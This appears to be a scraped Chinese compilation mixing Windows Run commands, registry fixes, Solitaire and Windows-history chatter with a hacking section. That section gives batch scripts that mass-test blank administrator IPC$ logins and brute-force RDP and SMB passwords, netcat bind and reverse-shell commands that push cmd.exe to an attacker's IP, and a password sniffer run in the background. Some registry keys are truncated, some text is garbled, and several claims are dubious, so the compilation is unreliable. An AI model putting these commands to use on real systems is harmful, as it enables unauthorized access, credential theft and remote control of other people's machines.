windows管理學命令

A. 電腦命令大全

gpedit.msc-----組策略
Nslookup-------IP地址偵測器
tsshutdn-------60秒倒計時關機命令
rononce -p ----15秒關機
sfc /scannow-----掃描錯誤並復原
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構(WMI)
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板

winmsd---------系統信息
wiaacmgr-------掃描儀和照相機向導
winchat--------XP自帶區域網聊天
mem.exe--------顯示內存使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
magnify--------放大鏡實用程序
mmc------------打開控制台
mobsync--------同步命令
dxdiag---------檢查DirectX信息
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁碟碎片整理程序
diskmgmt.msc---磁碟管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網路管理的工具向導
ntbackup-------系統備份和還原
narrator-------屏幕"講述人"
ntmsmgr.msc----移動存儲管理器

B. 常用Windows命令分享

在Windows的運行里輸入以下命令：

winver－－－－－－－－－檢查windows版本

wmimgmt.msc－－－－打開windows管理體系結構(wmi)

wupdmgr－－－－－－－－windows更新程序

w腳本－－－－－－－－windows腳本宿主設置

write－－－－－－－－－－寫字板

winmsd－－－－－－－－－系統信息

wiaacmgr－－－－－－－掃描儀和照相機向導

winchat－－－－－－－－xp自帶區域網聊天

mem.exe－－－－－－－－顯示內存使用情況

msconfig-----------啟動

msconfig.exe－－－系統配置實用程序

mplayer2－－－－－－－簡易widnows media player

mspaint－－－－－－－－畫圖板

mstsc－－－－－－－－－－遠程桌面連接

mplayer2－－－－－－－媒體播放機

magnify－－－－－－－－放大鏡實用程序

mmc－－－－－－－－－－－－打開控制台

mobsync－－－－－－－－同步命令

dxdiag－－－－－－－－－檢查directx信息

drwtsn32－－－－－－ 系統醫生

devmgmt.msc－－－ 設備管理器

dfrg.msc－－－－－－－磁碟碎片整理程序

diskmgmt.msc－－－磁碟管理實用程序

dcomcnfg－－－－－－－打開系統組件服務

ddeshare－－－－－－－打開dde共享設置

dvdplay－－－－－－－－dvd播放器

nslookup－－－－－－－ip地址偵測器

net stop messenger－－－－－停止信使服務

net start messenger－－－－開始信使服務

notepad－－－－－－－－打開記事本

nslookup－－－－－－－網路管理的工具向導

ntbackup－－－－－－－系統備份和還原

narrator－－－－－－－屏幕「講述人」

ntmsmgr.msc－－－－移動存儲管理器

ntmsoprq.msc－－－移動存儲管理員操作請求

netstat －an－－－－(tc)命令檢查介面

syncapp－－－－－－－－創建一個公文包

sysedit－－－－－－－－系統配置編輯器

sigverif－－－－－－－文件簽名驗證程序

sndrec32－－－－－－－錄音機

shrpubw－－－－－－－－創建共享文件夾

secpol.msc－－－－－本地安全策略

syskey－－－－－－－－－系統加密，一旦加密就不能解開，保護windows xp系統的雙重密碼

services.msc－－－本地服務設置

sndvol32－－－－－－－音量控製程序

sfc.exe－－－－－－－－系統文件檢查器

sfc /scannow－－－windows文件保護(掃描錯誤並復原)

tsshutdn－－－－－－－60秒倒計時關機命令

tourstart－－－－－－xp簡介（安裝完成後出現的漫遊xp程序）

taskmgr－－－－－－－－任務管理器 （2000／xp／2003）

eventvwr－－－－－－－事件查看器

eudcedit－－－－－－－造字程序

explorer－－－－－－－打開資源管理器

packager－－－－－－－對象包裝程序

perfmon.msc－－－－計算機性能監測程序

progman－－－－－－－－程序管理器

regedit.exe－－－－注冊表

rsop.msc－－－－－－－組策略結果集

regedt32－－－－－－－注冊表編輯器

rononce －p －－－－15秒關機

regsvr32 /u *.dll－－－－停止dll文件運行

regsvr32 /u zipfldr.dll－－－－－－取消zip支持

cmd.exe－－－－－－－－cmd命令提示符

chkdsk.exe－－－－－chkdsk磁碟檢查

certmgr.msc－－－－證書管理實用程序

calc－－－－－－－－－－－啟動計算器

charmap－－－－－－－－啟動字元映射表

cliconfg－－－－－－－sql server 客戶端網路實用程序

clipbrd－－－－－－－－剪貼板查看器

conf－－－－－－－－－－－啟動netmeeting

compmgmt.msc－－－計算機管理

cleanmgr－－－－－－－垃圾整理

ciadv.msc－－－－－－索引服務程序

osk－－－－－－－－－－－－打開屏幕鍵盤

odbcad32－－－－－－－odbc數據源管理器

oobe/msoobe /a－－－－檢查xp是否激活

lusrmgr.msc－－－－本機用戶和組

logoff－－－－－－－－－注銷命令

iexpress－－－－－－－木馬捆綁工具，系統自帶

fsmgmt.msc－－－－－共享文件夾管理器

utilman－－－－－－－－輔助工具管理器

gpedit.msc－－－－－組策略

windows XP系統蜘蛛牌游戲介紹

蜘蛛牌是windows xp操作系統自帶的一款紙牌游戲，游戲規則是這樣的：只能將牌拖到比她大一的牌上面（A最小，K最大），如果拖動的牌上有按順序排好的牌時，那麼這些牌也跟著一起移動，游戲的目的是將所有的牌按同一花色從小到大排好，為了簡單起見，我們的游戲只有同一花色的10張牌，從A到10，且隨機的在一行上展開，編號從1到10，把第i號上的牌移到第j號牌上，移動距離為abs(i-j)，現在你要做的是求出完成游戲的最小移動距離。

蜘蛛牌，spidersolitaire，是WindowsXP自帶的一個游戲，非常小隻有689K，可是有很多朋友百玩不厭。很多朋友在我安裝了系統的時候都希望我給他們找到 蜘蛛牌 。無奈，有的WindowsXP經過優化，沒有這個游戲，只好放上來，以備使用，希望沒有玩過的朋友有空也玩玩。

蜘蛛牌比掃雷等更加鍛煉腦子，是一個非常不錯的益智游戲。周圍有很多歲數大一點的朋友玩 蜘蛛牌 廢寢忘食，我有時候老想笑，不過也有我笑不出來的時候，因為我總是過不了關

聽說Vista中也保留了蜘蛛牌，看來這個游戲是常玩不衰了，由於規則簡單，此游戲深受辦公室MM的歡迎。

我本人不是怎麼會玩蜘蛛牌游戲，我試過一次只連過三局，第四局就沒拿下來。因為規則不是很懂，也沒有想著去研究，也許是我的腦子笨吧，哈。今天還發現我的一幫小朋友也愛上了蜘蛛。我給他們講故事的時候，很多人都是邊聽我說，手裡邊玩。

如何在Windows XP系統下使用「虛擬光碟機」？

Windows XP作為一款至今為止最優秀的個人電腦操作平台，不但界面華麗美觀，而且功能強大操作簡便。從各大報刊媒體對它的介紹來看可見一斑，它受歡迎的程度絕不亞於當時的Windows 98。

現在使用虛擬光碟機的朋友是越來越多了，另外隨著Windows XP打上了SP1補丁後，對游戲的兼容性的確大大提高了。所以現在用虛擬光碟玩游戲的朋友也相應增多了。

此時問題來了，由於大多數虛擬光碟機的開發者都是在FAT32環境下開發的，而如果您在安裝Windows XP時選擇了NTFS的分區格式，那麼死機或系統出現莫名故障就在所難免了。

原因很簡單，因為Windows XP為NTFS做了專門的優化，並且虛擬光碟機由於本身的特殊機制，在「設備管理器」中通過「欺騙」的手段讓Windows誤認為增加了物理光碟機，而在 Windows XP中系統只設計了還原硬體的驅動，但並沒有「還原/刪除」硬體本身的功能，因此兼容性問題就產生了。所以筆者建議那些在XP下使用虛擬光碟機的朋友們請安裝最新版並支持XP的虛擬軟體，這樣兼容問題會得到妥善的解決。

此外，在Windows XP下虛擬光碟機的個數也非常有講究。眾所周知，Windows XP採用了「激活」技術來防止盜版，並且在計算機硬體更改規定的.次數後要求再次進行激活，否則系統將會被鎖死。聰明的您可能通過前面的介紹已經想到如果虛擬了4個以上的物理光碟機，就可能會觸發XP的激活檢驗機制，因此筆者建議，您如果想使用4個以上的虛擬盤，還是安裝雙系統，在Windows 98下就不會有這樣尷尬的問題發生了。

IE被惡意代碼修改怎麼辦

我的IE主頁被不良網站篡改了，現在我的主頁選項是灰色的，無法更改，另外注冊表也進不去了，請問如何解決？

這個是使用IE上網比較常見的問題，首先請養成良好的上網習慣，這樣才能比較好的防止這種問題的發生。要解決這個問題的方法很多，登錄3721 網站進行IE修復就是個比較簡便的方法（前提當然是你不討厭3721）。我們這里著重說一下如何使用第三方軟體和修改注冊表這兩種方法。

⑴使用軟體修復：

下載金山毒霸注冊表修復工具。

下載回來的是一個運行文件Duba_RegSolve.EXE，雙擊運

行。如果你的注冊表被鎖住了的話，運行該工具就自動解鎖了。其它操作也非常簡單，而且有詳細的提示，選擇「IE常規」，點擊清理，IE即可修復成功。打開IE設置，所有原來灰色不可選的選項均恢復正常。另外選擇「右鍵菜單」功能可以清理掉你不需要的右鍵功能，這對一些不良網站留下的垃圾信息非常有效。你不要以為這樣就萬事大吉了，由於不良網站可能把某些自運行程序放進了你的系統，所以你重新啟動系統後，IE設置又可能被更改。為了解決這個問題，你可以選擇「啟動運行」這個選項，將可疑程序刪除，理論上刪除所有的項都不會影響系統的運行，但是還是建議保留輸入法圖標和電腦同步管理。當然這類IE的保護軟體還有很多，限於篇幅我就不多說了，大家可以自己嘗試。

⑵通過修改注冊表修復。

打開「記事本」，輸入下面內容：

WindowsRegistryEditorVersion5.00

[HKEY_CURRENT_]

"disableregistrytools"=dword:00000000

注意：對於Windows9x/Me來說，第一行一定是「REGEDIT4」，而且必須全部大寫。而對於Windows2000/XP來說，第一行一定是「Windows Registry Editor Version 5.00」。該信息非常重要，如果不正確，雖然在雙擊注冊表文件後會顯示已經導入，但其實並沒有成功修改注冊表文件的內容。第二行為空行。第三行為子鍵分支。第四行為該子鍵分支下的設置數據，其中的「dword」必須全部小寫。

雙擊打開該reg文件，當詢問您「確實要把*.reg內的信息添加到注冊表嗎？」，選擇「是」按鈕，即可將信息成功輸入注冊表中。

此時注冊表已成功解鎖，不必重新啟動計算機，只要點擊「開始｜運行」，鍵入Regedit命令，回車後即可打開注冊表。

以下提供常見問題需要修改的鍵值：

（1）恢復EXE文件的打開方式

在WINDOWS安裝目錄中找到REGEDIT.EXE，將其重命名為REGEDIT.COM，如果你的電腦無法瀏覽文件的後綴名，可以選擇「工具」-「文件夾選項」-「查看」-取消「隱藏已知文件類型的擴展名」。

[HKEY_CLASSES_ROOTexefileshellopencommand]

@=""%1"%*"

（2）刪除IE地址欄下拉菜單內的網址

[-HKEY_CURRENT_]

（3）修復windows注冊名稱和單位

[HKEY_LOCAL_]

"RegisteredOwner"="你所希望的名稱"

"RegisteredOrganization"="你所希望的單位"

（4）恢復桌面右鍵菜單

[HKEY_CURRENT_Explorer]

"NoViewContextMenu"=dword:00000000

[HKEY_LOCAL_PoliciesExplorer]

"NoViewContextMenu"=dword:0000

0000

（5）恢復桌面圖標

[HKEY_CURRENT_Explorer]

"NoDesktop"=-

[HKEY_LOCAL_PoliciesExplorer]

"NoDesktop"=-

（6）恢復被隱藏的控制面板

[HKEY_CURRENT_Explorer]

"NoSetFolders"=-

[HKEY_LOCAL_PoliciesExplorer]

"NoSetFolders"=-

（7）恢復IE工具欄的鏈接名稱

[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerToolbar]

"LinksFolderName"="鏈接"

（8）恢復internet選項安全頁面自定義按鈕

[HKEY_CURRENT_]

"SecChangeSettings"=dword:0

（9）修復隱藏分區

[HKEY_CURRENT_Explorer]

"NoDrives"=dword:000000

看Windows發展對用戶的潛移默化影響

如果對所有電腦用戶做一個問卷調查，收集他們心目中理想操作系統的模樣，相信會收到不計其數的意見。但是在這些意見中，或許絕大多數都是基於用戶正在使用的系統，要麼是這里修改一下，要麼是那裡加點東西，很難發現有什麼顛覆性的建議。回顧一下目前最流行的個人桌面操作系統Windows的發展，我們會發現在版本更迭過程中，Windows系統其實有不少成功的創新和變革，正是這些變化對用戶使用習慣產生了較大改變。

其實Windows的誕生本身就是一次革命，從命令行界面演變為圖形界面模式，讓電腦使用門檻大幅降低，用戶不再需要記憶各種常用命令，只需用滑鼠點幾下就行。而在Windows問世前，恐怕很少有用戶想過圖形化的操作界面，雖然Windows並不是（圖形界面系統）鼻祖，但它實實在在改變了用戶對電腦的使用方式。

PS：回想了一下，我最早接觸電腦那會兒，正是DOS和Win 3.x在國內流行的時候。

首個成功的Windows系統：Win 3.x

Win95，微軟第二個具有代表性的Windows系統（當然國內用戶更熟悉的是它升級改良後的版本：Win98），它建立了一套全新的Windows系統基本界面結構，包括桌面、開始按鈕和菜單、任務欄，窗口形式等，這些元素一直沿用到如今Windows 7，直到即將發售的Windows 8，開始按鈕和菜單才被取消。同時，Win95首次拋棄對16位處理器架構的支持，間接加速了32位處理器的發展。

同樣成功的Windows 95

除了這套用戶界面的基本元素外，Win95在隨後的升級過程中，先後加入了IE瀏覽器、USB支持等重要功能，讓電腦不再限於單機工作，普通用戶通過它首次踏入互聯網的世界。

Win95之後的Win98以性能改善為主，雖沒有什麼重大改變，但憑借良好的兼容性和易用性以及恰當的時機，成為第一個在國內大規模普及的Windows系統。Win2000則是主要面向工作站與伺服器，並不適合個人家庭用戶。

Windows XP，這是微軟首次將面向伺服器市場的NT核心引入到個人消費市場，因此XP的穩定性較Win98有大幅提高。這是一項核心級的改革，表面上雖然看不出什麼明顯區別，但具有十年以上電腦使用時間的用戶肯定會發覺變化。其他方面，XP引入了桌面主題和多種視覺特效（默認桌面藍天白雲甚至成為XP的代表）、內置防火牆（SP2版本加入）、遠程桌面、支持無線網路、支持64位架構等數項功能。

大家熟悉的WinXP

穩定的用戶體驗，是XP成功的重要支柱之一。

經歷XP的成功之後，Vista作為接班者並未獲得太多用戶的認可，雖然它在用戶界面以及安全性等方面有較大升級，但卻因為軟硬體兼容性和性能問題拖了後腿，導致市場反響不佳，成為近年來少有的不成功產品。

總結了Vista的經驗之後，Windows 7在正式發售前發布了多個測試版本供用戶體驗並收集反饋意見，事實證明這是個正確的選擇，Windows 7發售至今，已經賣出6億份以上的授權。

時下最流行的Windows 7系統

從功能上看，Win7進一步優化多核處理器效率以提升性能，更好的硬體設備支持，更方便的個性化設置，全新的日常任務操作體驗，更少的打擾用戶以及首次支持多點觸摸設備。Windows 7的Aero桌面主要繼承自Vista，並新增了一項我最喜歡的功能：超級任務欄。它讓用戶的注意重心從傳統桌面轉移到任務欄上，包括常用程序、最近使用的文件、文件夾都能從任務欄上快速調用，同時又不會佔用其他程序運行時的空間位置。

快速高效又不失華麗，讓Windows 7成為眼下最流行的個人電腦操作系統。

未來，Windows 8又將會帶來不同的新體驗，無論你是用傳統電腦還是平板設備，通過Windows 8用戶只需極短的適應過程就能玩轉在兩種設備之間。

Windows關機重啟只在一秒瞬間

1.關機/重啟只要1秒鍾

Windows 2000/XP關機速度慢一直是不少用戶的隱痛，因此有人摸索出了下面這個「非正常」的技巧。

如果想讓Windows 2000以瞬間的速度重啟，那麼可以按下Ctrl+Alt+Del組合??幼旁詰慊鰲骯鞀?卑磁耐?卑醋?trl，這時系統會彈出警告提示:「如果繼續，您的機器會重新啟動，未保存的數據將丟失，如非絕對必要，請勿採取此步驟」，點擊「確定」，那麼Windows 2000將會瞬間重啟，並不會顯示關機畫面。

對於Windows XP，則可以在按下Ctrl+Alt+Del後，在彈出的「任務管理器」中點擊「關機→關機」，與此同時按Ctrl，不到1秒鍾你會發現系統已經關閉了，簡直就在眨眼之間，同樣道理，如果在「關機」菜單中選擇「重啟」，即可快速重啟。

2.Super Fast Shutdown令關機、重啟超級快

上面的技巧總感覺有些不太美妙，有可能會造成數據丟失或其他問題，因此建議你選擇Super Fast Shutdown這款免費軟體。安裝後它會在桌面和快速啟動欄生成關機和重啟的快捷方式，只要按下相應的快捷方式，就能在瞬間關機或重啟。不過要注意的是，有些電腦在關機後，會出現「現在可以安全地關機了」的畫面，還需要按下機箱上的電源按鈕來徹底關閉。

小提示

建議在按下相應快捷方式前，將所有打開的程序關閉掉，以免出現數據丟失的問題。

C. 麻煩各位告訴我一些DOS命令，什麼命令都行啊

passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）

附：批處理命令與變數

1：for命令及變數 基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0—%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2—%9指輸入的第2-9個值；例：net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；"(1 -1 254)"說明：即從254到1 }

command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如(d:\pass.txt)時 }。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。

/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。

#7 七：

2：if命令及變數 基本格式：
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為"真"。
例：IF errorlevel 0 命令 指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配（即：字元串1 等於 字元串2），就執行後面的命令。
例："if "%2%"=="4" goto start"指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加" "）
IF [not] exist 文件名 命令語句 如果指定的文件名存在，就執行後面的命令。
例："if not nc.exe goto end"指：如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句後指：當前面的條件不成立時，就指行else後面的命令。注意：else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才能執行，用上< >後就等於是單獨一行了；例如："if exist test.txt. else echo test.txt.missing "，注意命令中的"."

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註：
| 管道命令
< 或 > 重定向命令。"<"，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠ 表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:\winnt >> d:\log.txt 意思是：後台執行dir，並把結果存在d:\log.txt中
>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

#8 八：

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測"hostlist.txt"文件中列出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機

#9 九：

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接（多線程）
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用－f後面的密碼
-F 間隔時間（頻率）
-l 使用－l後面的用戶名
-w 使用－w後面的密碼字典
-p 使用－p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) （假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.txt)
3389.bat意思是：從3389.txt文件中取一個IP，接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下；就可以等待結果了)
hack.bat意思是：運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼，並將破解結果保存在rouji.txt文件中。

5、其它：

Shutdown.exe
Shutdown \\IP地址 t:20 20秒後將對方NT自動關閉（Windows 2003系統自帶工具，在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。）
fpipe.exe (TCP埠重定向工具) 在第二篇中有詳細說明（埠重定向繞過防火牆）
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當有人掃錨你的80埠時，他掃到的結果會完全是www.sina.com.cn的主機信息
Fpipe -l 23 -s 88 -r 23 目標IP 把本機向目標IP發送的23埠Telnet請求經埠重定向後，就通過88埠發送到目標IP的23埠。（與目標IP建立Telnet時本機就用的88埠與其相連接）然後：直接Telnet 127.0.0.1（本機IP）就連接到目標IP的23埠了。
OpenTelnet.exe (遠程開啟telnet工具)
opentelnet.exe \\IP 帳號 密碼 ntlm認證方式 Telnet埠 （不需要上傳ntlm.exe破壞微軟的身份驗證方式）直接遠程開啟對方的telnet服務後，就可用telnet \\ip 連接上對方。
NTLM認證方式：0：不使用NTLM身份驗證；1：先嘗試NTLM身份驗證，如果失敗，再使用用戶名和密碼；2：只使用NTLM身份驗證。

ResumeTelnet.exe (OpenTelnet附帶的另一個工具)
resumetelnet.exe \\IP 帳號 密碼 用Telnet連接完對方後，就用這個命令將對方的Telnet設置還原，並同時關閉Telnet服務。

#10 十：

6、FTP命令詳解：

FTP命令是Internet用戶使用最頻繁的命令之一，熟悉並靈活應用FTP的內部命令，可以大大方便使用者，並收到事半功倍之效。如果你想學習使用進行後台FTP下載，那麼就必須學習FTP指令。

FTP的命令行格式為：
ftp -v -d -i -n -g [主機名] ，其中

-v 顯示遠程伺服器的所有響應信息；

-n 限制ftp的自動登錄，即不使用；.n etrc文件；

-d 使用調試方式；

-g 取消全局文件名。

FTP使用的內部命令如下(中括弧表示可選項):

1.![cmd[args]]：在本地機中執行交互shell，exit回到ftp環境，如：!ls*.zip
2.$ macro-ame[args]： 執行宏定義macro-name。

3.account[password]： 提供登錄遠程系統成功後訪問系統資源所需的補充口令。
4.append local-file[remote-file]：將本地文件追加到遠程系統主機，若未指定遠程系統文件名，則使用本地文件名。

5.ascii：使用ascii類型傳輸方式。
6.bell：每個命令執行完畢後計算機響鈴一次。

7.bin：使用二進制文件傳輸方式。
8.bye：退出ftp會話過程。

9.case：在使用mget時，將遠程主機文件名中的大寫轉為小寫字母。
10.cd remote-dir：進入遠程主機目錄。

11.cp：進入遠程主機目錄的父目錄。
12.chmod mode file-name：將遠程主機文件file-name的存取方式設置為mode，如：chmod 777 a.out。

13.close：中斷與遠程伺服器的ftp會話(與open對應)。
14.cr：使用asscii方式傳輸文件時，將回車換行轉換為回行。

15.delete remote-file：刪除遠程主機文件。
16.debug[debug-value]：設置調試方式， 顯示發送至遠程主機的每條命令，如：deb up 3，若設為0，表示取消debug。

17.dir[remote-dir][local-file]：顯示遠程主機目錄，並將結果存入本地文件。
18.disconnection：同close。

19.form format：將文件傳輸方式設置為format，預設為file方式。
20.get remote-file[local-file]： 將遠程主機的文件remote-file傳至本地硬碟的local-file。

21.glob：設置mdelete，mget，mput的文件名擴展，預設時不擴展文件名，同命令行的-g參數。
22.hash：每傳輸1024位元組，顯示一個hash符號(#)。

23.help[cmd]：顯示ftp內部命令cmd的幫助信息，如：help get。
24.idle[seconds]：將遠程伺服器的休眠計時器設為[seconds]秒。

25.image：設置二進制傳輸方式(同binary)。
26.lcd[dir]：將本地工作目錄切換至dir。

27.ls[remote-dir][local-file]：顯示遠程目錄remote-dir， 並存入本地文件local-file。
28.macdef macro-name：定義一個宏，遇到macdef下的空行時，宏定義結束。

29.mdelete[remote-file]：刪除遠程主機文件。
30.mdir remote-files local-file：與dir類似，但可指定多個遠程文件，如 ：mdir *.o.*.zipoutfile 。

31.mget remote-files：傳輸多個遠程文件。
32.mkdir dir-name：在遠程主機中建一目錄。

33.mls remote-file local-file：同nlist，但可指定多個文件名。
34.mode[modename]：將文件傳輸方式設置為modename， 預設為stream方式。

35.modtime file-name：顯示遠程主機文件的最後修改時間。
36.mput local-file：將多個文件傳輸至遠程主機。

37.newer file-name： 如果遠程機中file-name的修改時間比本地硬碟同名文件的時間更近，則重傳該文件。
38.nlist[remote-dir][local-file]：顯示遠程主機目錄的文件清單，並存入本地硬碟的local-file。

